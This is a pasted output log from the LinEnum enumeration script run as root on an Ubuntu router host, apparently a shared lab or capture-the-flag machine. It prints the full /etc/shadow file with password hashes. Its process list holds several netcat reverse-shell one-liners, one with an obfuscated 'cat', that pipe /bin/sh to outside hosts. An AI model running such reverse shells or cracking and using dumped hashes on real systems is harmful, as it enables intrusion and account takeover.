Untitled

a guest
Jan 7th, 2019
  1. #########################################################
  2. # Local Linux Enumeration & Privilege Escalation Script #
  3. #########################################################
  4. # www.rebootuser.com
  5. # version 0.94
  6.  
  7. [-] Debug Info
  8. [+] Thorough tests = Disabled (SUID/GUID checks will not be perfomed!)
  9.  
  10.  
  11. Scan started at:
  12. Mon Jan 7 23:08:38 UTC 2019
  13.  
  14.  
  15. ### SYSTEM ##############################################
  16. [-] Kernel information:
  17. Linux r1 4.15.0-24-generic #26-Ubuntu SMP Wed Jun 13 08:44:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
  18.  
  19.  
  20. [-] Kernel information (continued):
  21. Linux version 4.15.0-24-generic (buildd@lgw01-amd64-056) (gcc version 7.3.0 (Ubuntu 7.3.0-16ubuntu3)) #26-Ubuntu SMP Wed Jun 13 08:44:47 UTC 2018
  22.  
  23.  
  24. [-] Specific release information:
  25. DISTRIB_ID=Ubuntu
  26. DISTRIB_RELEASE=16.04
  27. DISTRIB_CODENAME=xenial
  28. DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS"
  29. NAME="Ubuntu"
  30. VERSION="16.04.4 LTS (Xenial Xerus)"
  31. ID=ubuntu
  32. ID_LIKE=debian
  33. PRETTY_NAME="Ubuntu 16.04.4 LTS"
  34. VERSION_ID="16.04"
  35. HOME_URL="http://www.ubuntu.com/"
  36. SUPPORT_URL="http://help.ubuntu.com/"
  37. BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
  38. VERSION_CODENAME=xenial
  39. UBUNTU_CODENAME=xenial
  40.  
  41.  
  42. [-] Hostname:
  43. r1
  44.  
  45.  
  46. ### USER/GROUP ##########################################
  47. [-] Current user/group info:
  48. uid=0(root) gid=0(root) groups=0(root)
  49.  
  50.  
  51. [-] Who else is logged on:
  52. 23:08:38 up 2:24, 0 users, load average: 2.80, 3.93, 3.06
  53. USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
  54.  
  55.  
  56. [-] Group memberships:
  57. uid=0(root) gid=0(root) groups=0(root)
  58. uid=1(daemon) gid=1(daemon) groups=1(daemon)
  59. uid=2(bin) gid=2(bin) groups=2(bin)
  60. uid=3(sys) gid=3(sys) groups=3(sys)
  61. uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
  62. uid=5(games) gid=60(games) groups=60(games)
  63. uid=6(man) gid=12(man) groups=12(man)
  64. uid=7(lp) gid=7(lp) groups=7(lp)
  65. uid=8(mail) gid=8(mail) groups=8(mail)
  66. uid=9(news) gid=9(news) groups=9(news)
  67. uid=10(uucp) gid=10(uucp) groups=10(uucp)
  68. uid=13(proxy) gid=13(proxy) groups=13(proxy)
  69. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  70. uid=34(backup) gid=34(backup) groups=34(backup)
  71. uid=38(list) gid=38(list) groups=38(list)
  72. uid=39(irc) gid=39(irc) groups=39(irc)
  73. uid=41(gnats) gid=41(gnats) groups=41(gnats)
  74. uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
  75. uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
  76. uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
  77. uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
  78. uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
  79. uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
  80. uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
  81. uid=106(lxd) gid=65534(nogroup) groups=65534(nogroup)
  82. uid=107(messagebus) gid=111(messagebus) groups=111(messagebus)
  83. uid=108(uuidd) gid=112(uuidd) groups=112(uuidd)
  84. uid=109(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
  85. uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup)
  86. uid=111(pollinate) gid=1(daemon) groups=1(daemon)
  87. uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),110(lxd)
  88. uid=112(quagga) gid=117(quagga) groups=117(quagga)
  89.  
  90.  
  91. [-] It looks like we have some admin users:
  92. uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
  93. uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),110(lxd)
  94.  
  95.  
  96. [-] Contents of /etc/passwd:
  97. root:x:0:0:root:/root:/bin/bash
  98. daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  99. bin:x:2:2:bin:/bin:/usr/sbin/nologin
  100. sys:x:3:3:sys:/dev:/usr/sbin/nologin
  101. sync:x:4:65534:sync:/bin:/bin/sync
  102. games:x:5:60:games:/usr/games:/usr/sbin/nologin
  103. man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  104. lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  105. mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  106. news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  107. uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  108. proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  109. www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  110. backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  111. list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  112. irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
  113. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
  114. nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  115. systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
  116. systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
  117. systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
  118. systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
  119. syslog:x:104:108::/home/syslog:/bin/false
  120. _apt:x:105:65534::/nonexistent:/bin/false
  121. lxd:x:106:65534::/var/lib/lxd/:/bin/false
  122. messagebus:x:107:111::/var/run/dbus:/bin/false
  123. uuidd:x:108:112::/run/uuidd:/bin/false
  124. dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
  125. sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
  126. pollinate:x:111:1::/var/cache/pollinate:/bin/false
  127. ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
  128. quagga:x:112:117:Quagga routing suite,,,:/var/run/quagga/:/bin/false
  129.  
  130.  
  131. [+] We can read the shadow file!
  132. root:$6$39RGMx6s$l.2O2Uc8z73bzQ.JpJxXCVvOVnHdjPebC511IIeN.tX6l/PEUDB3bhvChSS2zuy8zVOtkSy2VNJ1Bf75.Qr4t1:17903:0:99999:7:::
  133. daemon:*:17704:0:99999:7:::
  134. bin:*:17704:0:99999:7:::
  135. sys:*:17704:0:99999:7:::
  136. sync:*:17704:0:99999:7:::
  137. games:*:17704:0:99999:7:::
  138. man:*:17704:0:99999:7:::
  139. lp:*:17704:0:99999:7:::
  140. mail:*:17704:0:99999:7:::
  141. news:*:17704:0:99999:7:::
  142. uucp:*:17704:0:99999:7:::
  143. proxy:*:17704:0:99999:7:::
  144. www-data:*:17704:0:99999:7:::
  145. backup:*:17704:0:99999:7:::
  146. list:*:17704:0:99999:7:::
  147. irc:*:17704:0:99999:7:::
  148. gnats:*:17704:0:99999:7:::
  149. nobody:*:17704:0:99999:7:::
  150. systemd-timesync:*:17704:0:99999:7:::
  151. systemd-network:*:17704:0:99999:7:::
  152. systemd-resolve:*:17704:0:99999:7:::
  153. systemd-bus-proxy:*:17704:0:99999:7:::
  154. syslog:*:17704:0:99999:7:::
  155. _apt:*:17704:0:99999:7:::
  156. lxd:*:17704:0:99999:7:::
  157. messagebus:*:17704:0:99999:7:::
  158. uuidd:*:17704:0:99999:7:::
  159. dnsmasq:*:17704:0:99999:7:::
  160. sshd:*:17704:0:99999:7:::
  161. pollinate:*:17704:0:99999:7:::
  162. ubuntu:$6$mUl1xHIc$imY3ECxHews2PTpfqK0WQ5SK58eKMPSFEjJy8StuWIEiOCBsg1N/NsrYxwSK8lLKyhH3c.nU4rcs9wI3RNkd71:17903:0:99999:7:::
  163. quagga:*:17713:0:99999:7:::
  164.  
  165.  
  166. [-] Super user account(s):
  167. root
  168.  
  169.  
  170. [-] Sudoers configuration (condensed):Defaults env_reset
  171. Defaults mail_badpass
  172. Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
  173. root ALL=(ALL:ALL) ALL
  174. %admin ALL=(ALL) ALL
  175. %sudo ALL=(ALL:ALL) ALL
  176.  
  177.  
  178. [+] We can sudo without supplying a password!
  179. Matching Defaults entries for root on r1:
  180. env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
  181.  
  182. User root may run the following commands on r1:
  183. (ALL : ALL) ALL
  184.  
  185.  
  186. [+] We can read root's home directory!
  187. total 84K
  188. drwx------ 1 root root 226 Jan 7 23:06 .
  189. drwxr-xr-x 1 root root 140 Jun 22 2018 ..
  190. -rw-r--r-- 1 root root 3.1K Jul 2 2018 .bashrc
  191. drwx------ 1 root root 40 Jul 2 2018 .cache
  192. -rwxr-xr-x 1 root root 45K Jan 5 21:28 LinEnum.sh
  193. drwxr-xr-x 1 root root 0 Jul 2 2018 .nano
  194. -rw-r--r-- 1 root root 7.1K Jan 7 23:08 output.txt
  195. prw-r--r-- 1 root root 0 Jan 7 20:57 pipe
  196. -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
  197. -rw-r--r-- 1 root root 66 Jul 2 2018 .selected_editor
  198. -rwxr-xr-x 1 root root 66 Jan 7 22:52 shell.sh
  199. drwx------ 1 root root 84 Jan 7 20:55 .ssh
  200. -rw-r--r-- 1 root root 0 Jul 3 2018 test_intercept.pcap
  201. -rw-r--r-- 1 root root 33 Jul 2 2018 user.txt
  202. -rw------- 1 root root 5.0K Jul 3 2018 .viminfo
  203.  
  204.  
  205. [-] Are permissions on /home directories lax:
  206. total 0
  207. drwxr-xr-x 1 root root 12 Jul 1 2018 .
  208. drwxr-xr-x 1 root root 140 Jun 22 2018 ..
  209. drwxr-xr-x 1 ubuntu ubuntu 62 Jul 1 2018 ubuntu
  210.  
  211.  
  212. ### ENVIRONMENTAL #######################################
  213. [-] Environment information:
  214. XDG_SESSION_ID=317
  215. SHELL=/bin/bash
  216. SSH_CLIENT=10.99.64.251 48274 22
  217. USER=root
  218. PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
  219. MAIL=/var/mail/root
  220. PWD=/root
  221. LANG=en_US.UTF-8
  222. HOME=/root
  223. SHLVL=5
  224. LOGNAME=root
  225. SSH_CONNECTION=10.99.64.251 48274 10.99.64.2 22
  226. VTYSH_PAGER=more
  227. VIMRUNTIME=/usr/share/vim/vim74
  228. XDG_RUNTIME_DIR=/run/user/0
  229. VIM=/usr/share/vim
  230. _=/usr/bin/env
  231.  
  232.  
  233. [-] Path information:
  234. /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
  235.  
  236.  
  237. [-] Available shells:
  238. # /etc/shells: valid login shells
  239. /bin/sh
  240. /bin/dash
  241. /bin/bash
  242. /bin/rbash
  243. /usr/bin/tmux
  244. /usr/bin/screen
  245.  
  246.  
  247. [-] Current umask value:
  248. 0022
  249. u=rwx,g=rx,o=rx
  250.  
  251.  
  252. [-] umask value as specified in /etc/login.defs:
  253. UMASK 022
  254.  
  255.  
  256. [-] Password and storage information:
  257. PASS_MAX_DAYS 99999
  258. PASS_MIN_DAYS 0
  259. PASS_WARN_AGE 7
  260. ENCRYPT_METHOD SHA512
  261.  
  262.  
  263. ### JOBS/TASKS ##########################################
  264. [-] Cron jobs:
  265. -rw-r--r-- 1 root root 722 Apr 5 2016 /etc/crontab
  266.  
  267. /etc/cron.d:
  268. total 12
  269. drwxr-xr-x 1 root root 70 Jun 22 2018 .
  270. drwxr-xr-x 1 root root 2988 Jan 7 21:14 ..
  271. -rw-r--r-- 1 root root 589 Jul 16 2014 mdadm
  272. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
  273. -rw-r--r-- 1 root root 190 Jun 22 2018 popularity-contest
  274.  
  275. /etc/cron.daily:
  276. total 48
  277. drwxr-xr-x 1 root root 234 Jul 1 2018 .
  278. drwxr-xr-x 1 root root 2988 Jan 7 21:14 ..
  279. -rwxr-xr-x 1 root root 376 Mar 31 2016 apport
  280. -rwxr-xr-x 1 root root 1474 Mar 6 2018 apt-compat
  281. -rwxr-xr-x 1 root root 355 May 22 2012 bsdmainutils
  282. -rwxr-xr-x 1 root root 1597 Nov 26 2015 dpkg
  283. -rwxr-xr-x 1 root root 372 May 6 2015 logrotate
  284. -rwxr-xr-x 1 root root 1293 Nov 6 2015 man-db
  285. -rwxr-xr-x 1 root root 539 Jul 16 2014 mdadm
  286. -rwxr-xr-x 1 root root 435 Nov 18 2014 mlocate
  287. -rwxr-xr-x 1 root root 249 Nov 12 2015 passwd
  288. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
  289. -rwxr-xr-x 1 root root 3449 Feb 26 2016 popularity-contest
  290. -rwxr-xr-x 1 root root 214 May 24 2016 update-notifier-common
  291.  
  292. /etc/cron.hourly:
  293. total 4
  294. drwxr-xr-x 1 root root 24 Jun 22 2018 .
  295. drwxr-xr-x 1 root root 2988 Jan 7 21:14 ..
  296. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
  297.  
  298. /etc/cron.monthly:
  299. total 4
  300. drwxr-xr-x 1 root root 24 Jun 22 2018 .
  301. drwxr-xr-x 1 root root 2988 Jan 7 21:14 ..
  302. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
  303.  
  304. /etc/cron.weekly:
  305. total 16
  306. drwxr-xr-x 1 root root 92 Jul 1 2018 .
  307. drwxr-xr-x 1 root root 2988 Jan 7 21:14 ..
  308. -rwxr-xr-x 1 root root 86 Apr 13 2016 fstrim
  309. -rwxr-xr-x 1 root root 771 Nov 6 2015 man-db
  310. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
  311. -rwxr-xr-x 1 root root 211 May 24 2016 update-notifier-common
  312.  
  313.  
  314. [-] Crontab contents:
  315. # /etc/crontab: system-wide crontab
  316. # Unlike any other crontab you don't have to run the `crontab'
  317. # command to install the new version when you edit this file
  318. # and files in /etc/cron.d. These files also have username fields,
  319. # that none of the other crontabs do.
  320.  
  321. SHELL=/bin/sh
  322. PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
  323.  
  324. # m h dom mon dow user command
  325. 17 * * * * root cd / && run-parts --report /etc/cron.hourly
  326. 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
  327. 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
  328. 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
  329. #
  330.  
  331.  
  332. [-] Anything interesting in /var/spool/cron/crontabs:
  333. total 4
  334. drwx-wx--T 1 root crontab 8 Jan 7 22:07 .
  335. drwxr-xr-x 1 root root 42 Jun 22 2018 ..
  336. -rw------- 1 root crontab 1118 Jul 2 2018 root
  337.  
  338.  
  339. [-] Jobs held by all users:
  340. # Edit this file to introduce tasks to be run by cron.
  341. #
  342. # Each task to run has to be defined through a single line
  343. # indicating with different fields when the task will be run
  344. # and what command to run for the task
  345. #
  346. # To define the time you can provide concrete values for
  347. # minute (m), hour (h), day of month (dom), month (mon),
  348. # and day of week (dow) or use '*' in these fields (for 'any').#
  349. # Notice that tasks will be started based on the cron's system
  350. # daemon's notion of time and timezones.
  351. #
  352. # Output of the crontab jobs (including errors) is sent through
  353. # email to the user the crontab file belongs to (unless redirected).
  354. #
  355. # For example, you can run a backup of all your user accounts
  356. # at 5 a.m every week with:
  357. # 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
  358. #
  359. # For more information see the manual pages of crontab(5) and cron(8)
  360. #
  361. # m h dom mon dow command
  362. */10 * * * * /opt/restore.sh
  363.  
  364.  
  365. [-] Systemd timers:
  366. NEXT LEFT LAST PASSED UNIT ACTIVATES
  367. Tue 2019-01-08 06:46:32 UTC 7h left Mon 2019-01-07 20:44:05 UTC 2h 24min ago apt-daily-upgrade.timer apt-daily-upgrade.service
  368. Tue 2019-01-08 17:44:13 UTC 18h left Mon 2019-01-07 20:44:05 UTC 2h 24min ago apt-daily.timer apt-daily.service
  369. Tue 2019-01-08 20:58:58 UTC 21h left Mon 2019-01-07 20:58:58 UTC 2h 9min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
  370.  
  371. 3 timers listed.
  372. Enable thorough tests to see inactive timers
  373.  
  374.  
  375. ### NETWORKING ##########################################
  376. [-] Network and IP info:
  377. eth0 Link encap:Ethernet HWaddr 00:16:3e:d9:04:ea
  378. inet addr:10.99.64.2 Bcast:10.99.64.255 Mask:255.255.255.0
  379. inet6 addr: fe80::216:3eff:fed9:4ea/64 Scope:Link
  380. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
  381. RX packets:16929 errors:0 dropped:0 overruns:0 frame:0
  382. TX packets:13670 errors:0 dropped:0 overruns:0 carrier:0
  383. collisions:0 txqueuelen:1000
  384. RX bytes:7577356 (7.5 MB) TX bytes:23523353 (23.5 MB)
  385.  
  386. eth1 Link encap:Ethernet HWaddr 00:16:3e:8a:f2:4f
  387. inet addr:10.78.10.1 Bcast:10.78.10.255 Mask:255.255.255.0
  388. inet6 addr: fe80::216:3eff:fe8a:f24f/64 Scope:Link
  389. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
  390. RX packets:1001 errors:0 dropped:0 overruns:0 frame:0
  391. TX packets:931 errors:0 dropped:0 overruns:0 carrier:0
  392. collisions:0 txqueuelen:1000
  393. RX bytes:71758 (71.7 KB) TX bytes:63054 (63.0 KB)
  394.  
  395. eth2 Link encap:Ethernet HWaddr 00:16:3e:20:98:df
  396. inet addr:10.78.11.1 Bcast:10.78.11.255 Mask:255.255.255.0
  397. inet6 addr: fe80::216:3eff:fe20:98df/64 Scope:Link
  398. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
  399. RX packets:707 errors:0 dropped:0 overruns:0 frame:0
  400. TX packets:2811 errors:0 dropped:0 overruns:0 carrier:0
  401. collisions:0 txqueuelen:1000
  402. RX bytes:49606 (49.6 KB) TX bytes:155949 (155.9 KB)
  403.  
  404. lo Link encap:Local Loopback
  405. inet addr:127.0.0.1 Mask:255.0.0.0
  406. inet6 addr: ::1/128 Scope:Host
  407. UP LOOPBACK RUNNING MTU:65536 Metric:1
  408. RX packets:24489 errors:0 dropped:0 overruns:0 frame:0
  409. TX packets:24489 errors:0 dropped:0 overruns:0 carrier:0
  410. collisions:0 txqueuelen:1000
  411. RX bytes:1085180 (1.0 MB) TX bytes:1085180 (1.0 MB)
  412.  
  413. lo:0 Link encap:Local Loopback
  414. inet addr:10.120.15.10 Mask:255.255.255.128
  415. UP LOOPBACK RUNNING MTU:65536 Metric:1
  416.  
  417.  
  418. [-] ARP history:
  419. ? (10.78.11.2) at 00:16:3e:c4:fa:83 [ether] on eth2
  420. ? (10.78.10.2) at 00:16:3e:5b:49:a9 [ether] on eth1
  421. ? (10.99.64.251) at 00:16:3e:f3:92:14 [ether] on eth0
  422. ? (10.99.64.1) at fe:0d:18:88:55:67 [ether] on eth0
  423.  
  424.  
  425. [-] Default route:
  426. default 10.99.64.1 0.0.0.0 UG 0 0 0 eth0
  427.  
  428.  
  429. [-] Listening TCP:
  430. Active Internet connections (servers and established)
  431. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
  432. tcp 0 0 127.0.0.1:2601 0.0.0.0:* LISTEN 6824/zebra
  433. tcp 0 0 127.0.0.1:2605 0.0.0.0:* LISTEN 6828/bgpd
  434. tcp 0 0 0.0.0.0:179 0.0.0.0:* LISTEN 6828/bgpd
  435. tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 3455/sshd
  436. tcp 0 0 10.99.64.2:22 10.99.64.251:46856 ESTABLISHED 1085/sshd: root@not
  437. tcp 0 0 10.99.64.2:22 10.99.64.251:47954 ESTABLISHED 5394/sshd: root@not
  438. tcp 0 0 10.78.11.1:179 10.78.11.2:35148 ESTABLISHED 6828/bgpd
  439. tcp 0 0 10.99.64.2:22 10.99.64.251:47500 ESTABLISHED 4144/sshd: root@not
  440. tcp 0 0 10.99.64.2:22 10.99.64.251:47966 ESTABLISHED 5433/sshd: root@not
  441. tcp 0 0 10.78.10.1:54166 10.78.10.2:179 ESTABLISHED 6828/bgpd
  442. tcp 0 0 10.99.64.2:22 10.99.64.251:46974 ESTABLISHED 2262/sshd: root@not
  443. tcp 0 0 10.99.64.2:55940 10.10.12.58:2222 ESTABLISHED 3953/bash
  444. tcp 0 0 10.99.64.2:22 10.99.64.251:48054 ESTABLISHED 5908/sshd: root@not
  445. tcp 0 0 10.99.64.2:22 10.99.64.251:48020 ESTABLISHED 5689/sshd: root@not
  446. tcp 0 0 10.99.64.2:22 10.99.64.251:48130 ESTABLISHED 6216/sshd: root@not
  447. tcp 0 0 10.99.64.2:22 10.99.64.251:47806 ESTABLISHED 4451/sshd: root@not
  448. tcp 0 0 10.99.64.2:50394 10.10.15.100:1234 ESTABLISHED 5284/nc
  449. tcp 0 0 10.99.64.2:22 10.99.64.251:47930 ESTABLISHED 5247/sshd: root@not
  450. tcp 0 0 10.99.64.2:37500 10.10.15.171:1002 ESTABLISHED 6533/nc
  451. tcp 0 0 10.99.64.2:22 10.99.64.251:48092 ESTABLISHED 6064/sshd: root@not
  452. tcp 0 0 10.99.64.2:53512 10.10.13.63:1234 ESTABLISHED 1252/nc
  453. tcp 0 0 10.99.64.2:22 10.99.64.251:46868 ESTABLISHED 1218/sshd: root@not
  454. tcp 0 0 10.99.64.2:22 10.99.64.251:46882 ESTABLISHED 1441/sshd: root@not
  455. tcp 0 0 10.99.64.2:22 10.99.64.251:47934 ESTABLISHED 5299/sshd: root@not
  456. tcp 0 0 10.99.64.2:22 10.99.64.251:48028 ESTABLISHED 5728/sshd: root@not
  457. tcp 0 0 10.99.64.2:22 10.99.64.251:48244 ESTABLISHED 6709/sshd: root@not
  458. tcp 0 0 10.99.64.2:22 10.99.64.251:48046 ESTABLISHED 5869/sshd: root@not
  459. tcp 0 0 10.99.64.2:22 10.99.64.251:48206 ESTABLISHED 6540/sshd: root@not
  460. tcp 0 0 10.99.64.2:45760 10.10.14.30:9998 ESTABLISHED 2295/bash
  461. tcp 0 0 10.99.64.2:22 10.99.64.251:48188 ESTABLISHED 6451/sshd: root@not
  462. tcp 0 0 10.99.64.2:22 10.99.64.251:46860 ESTABLISHED 1130/sshd: root@not
  463. tcp 0 0 10.99.64.2:22 10.99.64.251:48128 ESTABLISHED 6177/sshd: root@not
  464. tcp 0 0 10.99.64.2:22 10.99.64.251:48274 ESTABLISHED 7141/sshd: root@not
  465. tcp 0 0 10.99.64.2:22 10.99.64.251:48196 ESTABLISHED 6496/sshd: root@not
  466. tcp 0 0 10.99.64.2:22 10.99.64.251:48004 ESTABLISHED 5647/sshd: root@not
  467. tcp 0 0 10.99.64.2:22 10.99.64.251:47818 ESTABLISHED 4495/sshd: root@not
  468. tcp 0 0 10.99.64.2:47334 10.10.15.171:1001 ESTABLISHED 6752/nc
  469. tcp 0 0 10.99.64.2:46894 10.10.15.171:1001 ESTABLISHED 4488/nc
  470. tcp 0 0 10.99.64.2:22 10.99.64.251:48056 ESTABLISHED 5947/sshd: root@not
  471. tcp 0 0 10.99.64.2:22 10.99.64.251:47920 ESTABLISHED 5171/sshd: root@not
  472. tcp 0 0 10.99.64.2:22 10.99.64.251:47950 ESTABLISHED 5354/sshd: root@not
  473. tcp 0 0 10.99.64.2:46906 10.10.15.171:1001 ESTABLISHED 4532/nc
  474. tcp 0 0 10.99.64.2:22 10.99.64.251:48170 ESTABLISHED 6334/sshd: root@not
  475. tcp 0 0 10.99.64.2:22 10.99.64.251:47188 ESTABLISHED 3622/sshd: root@not
  476. tcp 0 0 10.99.64.2:22 10.99.64.251:48146 ESTABLISHED 6258/sshd: root@not
  477. tcp 0 0 10.99.64.2:42080 10.10.15.233:8765 ESTABLISHED 7174/bash
  478. tcp 0 0 10.99.64.2:22 10.99.64.251:47784 ESTABLISHED 4302/sshd: root@not
  479. tcp 0 0 10.99.64.2:22 10.99.64.251:47246 ESTABLISHED 3918/sshd: root@not
  480. tcp6 0 0 :::179 :::* LISTEN 6828/bgpd
  481. tcp6 0 0 :::22 :::* LISTEN 3455/sshd
  482.  
  483.  
  484. [-] Listening UDP:
  485. Active Internet connections (servers and established)
  486. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
  487. udp 1408 0 10.99.64.2:35127 10.10.15.233:9000 ESTABLISHED 5984/nc
  488. udp 0 0 10.99.64.2:41287 10.10.15.233:9000 ESTABLISHED 5945/nc
  489. udp 0 0 10.99.64.2:55664 10.10.15.233:9000 ESTABLISHED 6214/nc
  490.  
  491.  
  492. ### SERVICES #############################################
  493. [-] Running processes:
  494. USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
  495. root 1 0.0 0.2 45836 5752 ? Ss 20:43 0:02 /sbin/init
  496. root 51 0.0 0.2 35272 4652 ? Ss 20:43 0:00 /lib/systemd/systemd-journald
  497. root 66 0.0 0.1 41720 3072 ? Ss 20:43 0:00 /lib/systemd/systemd-udevd
  498. message+ 475 0.0 0.1 42896 3464 ? Ss 20:44 0:01 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
  499. root 479 0.0 0.2 274488 5660 ? Ssl 20:44 0:00 /usr/lib/accountsservice/accounts-daemon
  500. root 480 0.0 0.1 27728 2536 ? Ss 20:44 0:00 /usr/sbin/cron -f
  501. root 481 0.0 0.1 28544 2916 ? Ss 20:44 0:00 /lib/systemd/systemd-logind
  502. root 484 0.0 1.1 216564 22920 ? Ssl 20:44 0:00 /usr/lib/snapd/snapd
  503. daemon 485 0.0 0.0 26044 1968 ? Ss 20:44 0:00 /usr/sbin/atd -f
  504. root 488 0.0 0.0 5220 112 ? Ss 20:44 0:00 /sbin/iscsid
  505. root 489 0.0 0.1 5720 3536 ? SLs 20:44 0:01 /sbin/iscsid
  506. root 507 0.0 0.2 277176 5684 ? Ssl 20:44 0:00 /usr/lib/policykit-1/polkitd --no-debug
  507. root 521 0.0 0.0 14472 1616 console Ss+ 20:44 0:00 /sbin/agetty --noclear --keep-baud console 115200 38400 9600 linux
  508. root 774 0.0 0.2 36684 4516 ? Ss 20:46 0:00 /lib/systemd/systemd --user
  509. root 775 0.0 0.0 60884 1544 ? S 20:46 0:00 (sd-pam)
  510. root 1085 0.0 0.1 92796 2568 ? Ss 20:49 0:00 sshd: root@notty
  511. root 1115 0.0 0.0 11236 1676 ? Ss 20:49 0:00 bash -c ps waux | grep |rm /tmp/f;mkfifo /tmp/f;ci?x!t /tmp/f|/bin/sh -i 2>&1|nc 10.10.13.69 9988 >/tmp/f | grep -v grep
  512. root 1122 0.0 0.0 11236 196 ? S 20:49 0:00 bash -c ps waux | grep |rm /tmp/f;mkfifo /tmp/f;ci?x!t /tmp/f|/bin/sh -i 2>&1|nc 10.10.13.69 9988 >/tmp/f | grep -v grep
  513. root 1123 0.0 0.0 12944 444 ? S 20:49 0:00 grep -v grep
  514. root 1130 0.0 0.1 92796 2548 ? Ss 20:49 0:00 sshd: root@notty
  515. root 1160 0.0 0.0 11236 1600 ? Ss 20:49 0:00 bash -c ps waux | grep |rm /tmp/f;mkfifo /tmp/f;ci?x!t /tmp/f|/bin/sh -i 2>&1|nc 10.10.13.69 9988 >/tmp/f | grep -v grep
  516. root 1167 0.0 0.0 11236 196 ? S 20:49 0:00 bash -c ps waux | grep |rm /tmp/f;mkfifo /tmp/f;ci?x!t /tmp/f|/bin/sh -i 2>&1|nc 10.10.13.69 9988 >/tmp/f | grep -v grep
  517. root 1168 0.0 0.0 12944 452 ? S 20:49 0:00 grep -v grep
  518. root 1218 0.0 0.1 92796 2692 ? Ss 20:50 0:00 sshd: root@notty
  519. root 1248 0.0 0.0 11232 1732 ? Ss 20:50 0:00 bash -c ps waux | grep ; mkfifo pipe; nc -nv 10.10.13.63 1234 < pipe | /bin/sh 2>pipe >pipe | grep -v grep
  520. root 1252 0.0 0.0 11300 1708 ? S 20:50 0:00 nc -nv 10.10.13.63 1234
  521. root 1253 0.0 0.0 4504 792 ? S 20:50 0:00 /bin/sh
  522. root 1255 0.0 0.1 19896 2076 ? S 20:50 0:00 /bin/bash -i
  523. root 1441 0.0 0.1 92796 2500 ? Ss 20:51 0:00 sshd: root@notty
  524. root 1471 0.0 0.0 11236 1680 ? Ss 20:51 0:00 bash -c ps waux | grep |rm /tmp/f;mkfifo /tmp/f;ci?x!t /tmp/f|/bin/sh -i 2>&1|nc 10.10.13.69 9988 >/tmp/f | grep -v grep
